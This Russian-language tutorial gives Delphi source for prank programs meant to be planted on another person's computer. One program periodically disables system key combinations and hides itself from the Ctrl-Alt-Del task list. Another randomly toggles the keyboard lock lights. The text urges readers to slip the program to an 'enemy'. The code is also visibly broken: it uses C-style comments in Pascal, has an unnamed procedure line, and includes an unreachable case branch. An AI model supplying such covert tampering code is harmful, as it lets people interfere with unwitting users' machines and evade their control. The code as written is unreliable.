Ну а теперь продолжение нашего западлостроения на Дельфи. Теперь мы будем баловаться с клавиатурой.
Прога 1. Отключаем служебные комбинации клавиш
Для начала запусти Дельфи, выбери в меню Project--> View Source и набери вот это:
program antiklava;
uses Windows;
begin
end.
Так, основа готова. Теперь надо добавить ядро программы и объявления переменных:
program antiklava;
uses Windows; /* подключение необходимых модулей */
var
klava:boolean; /* объявление логической переменной */
begin
klava:=true; /* устанавливаем значение переменной */
while true do /* начинаем бесконечный цикл */
begin
Yield; /* делаем так, чтобы всё не подвисло :)*/
Sleep(2*60*1000); /* ничего не делаем 2 минуты */
klava:=not klava; /* присваиваем переменной противоположное значение */
if klava then SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, 0, 0) /* отключаем служебные комбинации клавиш */
else
SystemParametersInfo(SPI_SCREENSAVERRUNNING, 0, 0, 0);
end;
end.
Теперь готово, жми на СTRL-F9, и спеши подсовывать прогу врагу. Однако у нашей программы есть недостаток: хоть мы и запираем клаву, юзер всё равно сможет сбить нашу прогу CTRL-ALT-DEL. Непорядок... Будем исправлять. А исправить это можно двумя способами:
1. Отключить нажатие "трёх веселых кнопок".
2. Сделать так, чтобы наша прога не видна была через эти самые клавиши.
Первый способ заключается в самой проге, а для второго нужно вызвать функцию RegisterServiceProcess:
program antiklava;
uses Windows; /* подключение необходимых модулей */
var
klava:boolean; /* объявление логической переменной */
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';
begin
klava:=true; /* устанавливаем значение переменной */
RegisterServiceProcess(GetCurrentProcessID, 1);
while true do /* начинаем бесконечный цикл */
begin
Yield; /* делаем так, чтобы всё не подвисло :)*/
Sleep(2*60*1000); /* ничего не делаем 2 минуты */
klava:=not klava; /* присваиваем переменной противоположное значение */
if klava then SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, 0, 0) /* отключаем служебные комбинации клавиш */
else
SystemParametersInfo(SPI_SCREENSAVERRUNNING, 0, 0, 0);
end;
end.
И всё! Мы не видны через CTRL-ALT-DEL.
Прога 2. "Ой, а почему лампочки мигают?"
Как вы уже догадались, мы будем играться с Lock`ами. А именно с Num Lock, Caps Lock, Scroll Lock. Чтобы эти лампочки весело перемигивались, им надо помочь!
Сделай знакомые уже тебе действия в Дельфях, и набивай это:
program locks;
uses Windows; /* подключаем необходимые модули */
var
ks:TKeyboardState; /* объявляем переменную состояния клавиатуры */
i:integer; /* объявляем целочисленную переменную */
procedure
begin
while true do
begin
Yield;
Sleep(3*60*1000);
GetKeyboardState(ks); /* получаем состояние клавиатуры */
i:=Random(2);
case i of
0:KS[020] := KS[020] XOR 1;
1:KS[144] := KS[144] XOR 1;
2:KS[145] := KS[145] XOR 1;
end;
SetKeyboardState(ks);
end;
end.
Ну вот, всё что нам осталось - CTRL-F9. В следующих выпусках будет больше инфы и примеров. До следующей заподлянки!
P.S. Большинство примеров написано на Win32 API. Если кто-нибудь захочет переписать их под любой другой язык
программирования, знайте - это не возбраняется.